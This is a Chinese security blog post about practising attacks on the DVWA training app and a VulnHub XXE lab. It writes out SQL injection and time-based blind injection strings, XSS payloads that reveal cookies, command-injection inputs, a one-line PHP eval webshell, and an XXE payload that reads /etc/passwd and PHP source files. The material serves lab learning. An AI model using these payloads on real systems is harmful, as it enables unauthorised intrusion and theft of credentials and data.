<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Web安全, P1n9">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>Web安全 | P1n9</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="https://image.12679.top/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://image.12679.top/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://image.12679.top/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://image.12679.top/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://image.12679.top/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="https://image.12679.top/jquery/jquery.min.js"></script>
    
<meta name="generator" content="Hexo 5.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="P1n9" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">P1n9</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/galleries" class="waves-effect waves-light">
      
      <i class="fas fa-image" style="zoom: 0.6;"></i>
      
      <span>相册</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">P1n9</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/galleries" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-image"></i>
			
			相册
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/zdy/zdy.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/zdy/zdy.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://image.12679.top/featureimages/3.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Web安全</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://image.12679.top/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">web安全</span>
                            </a>
                        
                            <a href="/tags/CTF%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">CTF学习</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web%E5%AE%89%E5%85%A8/" class="post-category">
                                Web安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-04-13
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-04-14
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.5k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>

        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>本博客内容是看看雪论坛上的教程总结而来：</p>
<h2 id="Web安全"><a href="#Web安全" class="headerlink" title="Web安全"></a>Web安全</h2><p><strong>前提：环境安装</strong><br>DVWA下载地址：<a target="_blank" rel="noopener" href="https://github.com/ethicalhack3r/DVWA">https://github.com/ethicalhack3r/DVWA</a><br>Phpstudy下载地址：<a target="_blank" rel="noopener" href="http://phpstudy.php.cn/">http://phpstudy.php.cn</a></p>
<p><strong>操作方法：</strong><br>安装好win7的虚拟机，其他操作系统都可以，我安的是windows7，<br>下载phpstudy和DVWA上传到虚拟机中；<br><img src="http://image.12679.top/blog/camera/13.1.png"><br>第一步：运行phpstudy<br><img src="http://image.12679.top/blog/camera/13.2.png"></p>
<p>第二步：将下载好的DVWA文件放在www文件目录下面<br>然后在浏览器打开127.0.0.1/DVWA-master/DVWA-master/setup.php进行安装<br><img src="http://image.12679.top/blog/camera/13.3.png"><br>第三步：在config中将config.inc.php.dist拷贝一份然后改为config.inc.php就能够正常安装了<br><img src="http://image.12679.top/blog/camera/13.4.png"><br><img src="http://image.12679.top/blog/camera/13.5.png"><br>第四步：创建数据库，phpstudy中自带数据库，默认账号密码都是root，登录mysql数据库，然后创建dvwa，完成创建。</p>
<p>第五步：打开config.inc.php,修改如下：</p>
<pre><code>\$_DVWA[ 'db_server' ] = '127.0.0.1';
\$_DVWA[ 'db_database' ] = 'dvwa';
\$_DVWA[ 'db_user' ] = 'root';
\$_DVWA[ 'db_password' ] = 'root’;</code></pre>
<p><img src="http://image.12679.top/blog/camera/13.6.png"><br>然后浏览器打开<a target="_blank" rel="noopener" href="http://127.0.0.1/DVWA-master/DVWA-master/login.php">http://127.0.0.1/DVWA-master/DVWA-master/login.php</a><br><img src="http://image.12679.top/blog/camera/13.7.png"></p>
<p>输入账号admin和密码password之后可以进入</p>
<p><img src="http://image.12679.top/blog/camera/13.8.png"><br><img src="http://image.12679.top/blog/camera/13.9.png"><br><img src="http://image.12679.top/blog/camera/13.10.png"><br>该测试网站中都会有低中高难度，可以看源码分析，看如何绕过防护措施</p>
<h3 id="1、SQL注入"><a href="#1、SQL注入" class="headerlink" title="1、SQL注入"></a>1、SQL注入</h3><p>1&gt;首先，我们看一下正常的数据查询：</p>
<pre><code>?id=1select \* from user where id =‘1’</code></pre>
<p>当我们插入一段有语义的SQL语句’;drop table user–#：</p>
<pre><code>?id=1 ’;drop table user-- \#select \* from user where id =‘1’ ;drop table user--\#’</code></pre>
<p>这样就造成了在查询之后就删除了user表；</p>
<p>2&gt;所以简单的说产生sql注入的两个条件：一个是用户能够控制输入；二是原本程序执行的语句拼接了用户输入的数据；</p>
<p>Sql注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。</p>
<p>3&gt;sql注入流程：<br><img src="http://image.12679.top/blog/camera/13.11.png"><br>4&gt;sql注入语句：</p>
<pre><code>获取库名：union select 1,database()#

获取表明：union select 1,group_concat(table_name) from information_schema.tables
where table_schema=database()#

获取列名：union select 1,group_concat(column_name) from
information_schema.columns where table_name=‘user’#</code></pre>
<h3 id="2、SQL注入盲注"><a href="#2、SQL注入盲注" class="headerlink" title="2、SQL注入盲注"></a>2、SQL注入盲注</h3><p>1&gt;一般的sql注入在我们输入sql语句的时候都会返回我们执行sql语句的结果，比如我们插入database()，执行结果就会是列举出当前所在的数据库名称dvwa；</p>
<p>而盲注就好像是在做判断题，我们执行的结果不会显示出来，只会告诉你“对”或者“不对”，不会出现回显现象。</p>
<p>回显：就是显示正在执行的批处理命令及执行的结果等。</p>
<p>2&gt;</p>
<pre><code>猜测长度：1' and length(database())&gt;1 # 

  或&gt;1(依次递增1，2，3…)4

猜测库名：1' and ascii(substr(database(),1,1))&gt;97 #

  （对应ASCII码） dvwa

&lt;、&gt;号可以迅速确定大概范围

猜测表名：

（1）猜测表的数量：1' and (select count(table_name) from
information_schema.tables where table_schema=database())=2#

（2）猜测表长度：1' and length(substr((select table_name from
information_schema.tables where table_schema=database() limit 0,1),1))=1 #

（3）获取表名：1' and ascii(substr((select table_name from
information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97 #

（4）猜测字段的长度：1' and length(substr((select column_name from
information_schema.columns where table_name= ’users’ limit 0,1),1))=1 #

（5）猜解字段：1' and ascii(substr((select column_name from
information_schema.columns where table_name='users' limit 0,1),1,1))&gt;120 #</code></pre>
<p>3&gt;如果某些系统对于输入的语句没有回应，那么可以用基于时间的sql盲注</p>
<pre><code>（1）判断数据库长度：1' and if(length(database())=4,sleep(3),1) #

（2）猜测数据库名称：1' and if(ascii(substr(database(),1,1))&gt;97,sleep(3),1)#

（3）猜测表的数量：1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)#

（4）猜测表名的长度：1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #</code></pre>
<p>4&gt;sqlmap内容：（去网上下载sqlmap工具进行注入）</p>
<p>网站输入内容的链接放在这里运行即可</p>
<p>针对链接：python sqlmap.py –u “url”</p>
<p>网站输入内容后，提交之后抓包，将内容放到1.txt，之后运行</p>
<p>针对数据包: python sqlmap.py –r 1.txt</p>
<h3 id="3、跨站脚本攻击（XSS）"><a href="#3、跨站脚本攻击（XSS）" class="headerlink" title="3、跨站脚本攻击（XSS）"></a>3、跨站脚本攻击（XSS）</h3><p>1&gt;跨站脚本攻击-XSS,全称Cross site<br>scripting，特殊的注入攻击，相当于在代码中注入恶意的脚本，当用户访问页面时，在浏览器中触发并解析代码，完成攻击。</p>
<p>xss根据不同的攻击形式分为反射型xss、存储型xss、Dom型Xss。</p>
<p>2&gt;输入攻击脚本代码</p>
<pre><code>&lt;script&gt;alert('XSS')&lt;/script&gt;  
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;IFRAME SRC=javascript:alert(‘XSS’)&gt;&lt;/IFRAME&gt;//框架注入
"&gt; &lt;BODY ONLOAD="a();"&gt;&lt;SCRIPT&gt;function a(){alert('XSS');}
&lt;/SCRIPT&gt;&lt;"
&lt;A HREF=http://127.0.0.1/phpinfo.php&gt;link&lt;/A&gt; //链接注入
&lt;img src=1 onerror=alert(2)&gt;</code></pre>
<p>3&gt;Low等级的源码：<br><img src="http://image.12679.top/blog/camera/13.12.png"><br>没有加任何防护，上面的语言都可以成功</p>
<p>4&gt;Medium等级的源码：<br><img src="http://image.12679.top/blog/camera/13.13.png"><br>防护措施：将&lt;script&gt;替换为‘’,可以通过改变大小写，不用script语句来绕过这样的防护措施</p>
<p>5&gt;High等级的源码：<br><img src="http://image.12679.top/blog/camera/13.14.png"><br>防护措施：利用正则表达式将任何script的都过滤掉，</p>
<p>可以通过img语句等方式绕过</p>
<h3 id="4、跨站请求伪造（CSRF）"><a href="#4、跨站请求伪造（CSRF）" class="headerlink" title="4、跨站请求伪造（CSRF）"></a>4、跨站请求伪造（CSRF）</h3><p>1&gt;CSRF，全称Cross-site request<br>forgery，就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），引导诱骗用户点击存在恶意代码的页面，在受害人不知情的情况下利用受害者的身份向服务器发送请求，从而完成非法操作;</p>
<p>2&gt;图示：<br><img src="http://image.12679.top/blog/camera/13.15.png"><br>用户通过访问黑客的恶意网页，从而使黑客能够正常访问服务器</p>
<p>3&gt;low等级：<br><img src="http://image.12679.top/blog/camera/13.16.png"><br>4&gt;Med等级：<br><img src="http://image.12679.top/blog/camera/13.17.png"><br>5&gt;High等级<br><img src="http://image.12679.top/blog/camera/13.18.png"></p>
<h3 id="5、命令执行"><a href="#5、命令执行" class="headerlink" title="5、命令执行"></a>5、命令执行</h3><p>1&gt;命令注入，是指通过提交恶意构造的参数破坏命令</p>
<p>语句结构，从而达到执行恶意命令的目的。</p>
<p>2&gt;low等级<br><img src="http://image.12679.top/blog/camera/13.19.png"><br>可以用127.0.0.1&amp;&amp; net user命令进行注入</p>
<p>3&gt;Med等级<br><img src="http://image.12679.top/blog/camera/13.20.png"><br>可以用127.0.0.1|| net user命令进行注入</p>
<p>4&gt;High等级<br><img src="http://image.12679.top/blog/camera/13.21.png"><br>可以用127.0.0.1|net user命令进行注入</p>
<h3 id="6、文件上传"><a href="#6、文件上传" class="headerlink" title="6、文件上传"></a>6、文件上传</h3><p>1&gt;可以利用文件上传漏洞，上传一句话木马文件&lt;?php<br>@eval($_POST[‘Cknife’]);?&gt;，之后用菜刀工具连接，就可以访问服务器的任意文件</p>
<p>2&gt;low等级<br><img src="http://image.12679.top/blog/camera/13.22.png"><br>3&gt;Med等级<br><img src="http://image.12679.top/blog/camera/13.23.png"></p>
<p>先修改php文件修改为png格式，之后抓包后，修改回php格式的文件或者将php文件copy到img文件中，之后上传也可以</p>
<p>4&gt;High等级<br><img src="http://image.12679.top/blog/camera/13.24.png"></p>
<h3 id="7、文件包含"><a href="#7、文件包含" class="headerlink" title="7、文件包含"></a>7、文件包含</h3><p>1&gt;当服务器开启allow_url_include选项时，可以通过php的某些特性函数include()，require()，include_once()，require_once()利用url去动态包含文件，导致任意文件读取或任意命令执行。</p>
<p>文件包含分为两种：本地文件包含和远程文件包含（allow_url_fopen）</p>
<p>2&gt;low等级<br><img src="http://image.12679.top/blog/camera/13.25.png"><br>任意输入不同路径的文件，都可以访问成功</p>
<p>3&gt;Med等级<br><img src="http://image.12679.top/blog/camera/13.26.png"><br>禁止了相对路径，可以用绝对路径来访问</p>
<p>4&gt;High等级<br><img src="http://image.12679.top/blog/camera/13.27.png"><br>可以在路径前面加上file///也是可以的</p>
<h3 id="8、XXE漏洞"><a href="#8、XXE漏洞" class="headerlink" title="8、XXE漏洞"></a>8、XXE漏洞</h3><p>1&gt;测试环境下载链接：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/xxe">https://download.vulnhub.com/xxe</a> /XXE.zip，安装结果如下：<br><img src="http://image.12679.top/blog/camera/13.28.png"><br>  XML 被设计用来传输和存储数据。<br>  HTML 被设计用来显示数据。</p>
<p>3&gt;基础结构：<br><img src="http://image.12679.top/blog/camera/13.29.png"><br>4&gt;漏洞成因与后果:</p>
<p>XML数据在传输中数据被修改，服务器执行被恶意插入的代码，最终实现攻击的目的，XXE漏洞就是在XML在外部声明的时候出现了问题。</p>
<p>当运行引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害</p>
<p>5&gt;<strong>实例分析</strong>（其中的ip是根据VMWare的设置分配的，你的可能是其他）</p>
<p>打开kali虚拟机系统和xxe虚拟机系统，因为不知xxe虚拟机的账号和密码以及ip，需要对这个系统进行渗透，在kali系统中用nmap<br>192.168.186.1/24，这里的192.168.186.1是Vmware的网关地址，对VMWare内运行的ip进行扫描；</p>
<p>扫描结果：xxe的ip为192.168.186.130，里面有80端口开放，有/xxe/*和/admin.php路径，也可以通过在宿主机通过访问192.168.186.130/robots.txt得到，之后进行进一步渗透；<br><img src="http://image.12679.top/blog/camera/13.30.png"><br><img src="http://image.12679.top/blog/camera/13.31.png"><br>在宿主机的浏览器中访问192.168.186.130/xxe/，结果如图：<br><img src="http://image.12679.top/blog/camera/13.32.png"><br>由于不知道密码是多少，首先尝试一下爆破，用burpsuite抓下包，具体方法参考burp的使用方法：<br><img src="http://image.12679.top/blog/camera/13.33.png"><br>看到传过去的是一个xml格式，利用XXE漏洞，修改xml内容：<br>&lt;?xml version=”1.0” ?&gt;<br>  &lt;!DOCTYPE r [<br> &lt;!ELEMENT r ANY &gt;<br>  &lt;!ENTITY admin SYSTEM “file:///etc/passwd”&gt;<br>  ]&gt;<br>   &lt;root&gt;&lt;name&gt;&amp;admin;&lt;/name&gt;&lt;password&gt;kx&lt;/password&gt;&lt;/root&gt;</p>
<p>结果显示成功读出了文件内容<br><img src="http://image.12679.top/blog/camera/13.34.png"><br>  之前看到系统中有admin.php文件，将它按BASE64编码之后返回：<br>   &lt;?xml version=”1.0” ?&gt;<br>      &lt;!DOCTYPE r [<br>       &lt;!ELEMENT r ANY &gt;<br>     &lt;!ENTITY admin SYSTEM “php://filter/read=convert.base64-encode/resource=<br>      admin.php”&gt;<br>   ]&gt;<br>  &lt;root&gt;&lt;name&gt;&amp;admin;&lt;/name&gt;&lt;password&gt;kx&lt;/password&gt;&lt;/root&gt;<br><img src="http://image.12679.top/blog/camera/13.35.png"><br>之后用Decoder模块进行解码，可以看到用户名和密码<br><img src="http://image.12679.top/blog/camera/13.36.png"><br>去cmd5.com进行md5解码，结果为admin@123，之后去登录，发现登录不上<br><img src="http://image.12679.top/blog/camera/13.37.png"><br>再去查找，发现有个flagmeout.php的文件<br><img src="http://image.12679.top/blog/camera/13.38.png"><br>之后再用BASE64编码的方法返回flagmeout.php的编码内容<br><img src="http://image.12679.top/blog/camera/13.39.png"><br>然后将内容进行解码<br><img src="http://image.12679.top/blog/camera/13.40.png"><br>这是如何区分BASE16，BASE32，BASE64的简单方法<br><img src="http://image.12679.top/blog/camera/13.41.png"><br>用Base32方式进行解码<br><img src="http://image.12679.top/blog/camera/13.42.png"><br>用Base64方式解码<br><img src="http://image.12679.top/blog/camera/13.43.png"><br>最后得到一个/etc/.flag.php的结果<br>之后用前面那两个方式找到内容<br><img src="http://image.12679.top/blog/camera/13.44.png"><br><img src="http://image.12679.top/blog/camera/13.45.png"><br>上述内容前面加上&lt;?php，后面加上 ?&gt;,之后保存为php，运行后得到flag；</p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://12679.top" rel="external nofollow noreferrer">P1n9</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://12679.top/2020/04/13/13/">http://12679.top/2020/04/13/13/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://12679.top" target="_blank">P1n9</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">web安全</span>
                                </a>
                            
                                <a href="/tags/CTF%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">CTF学习</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
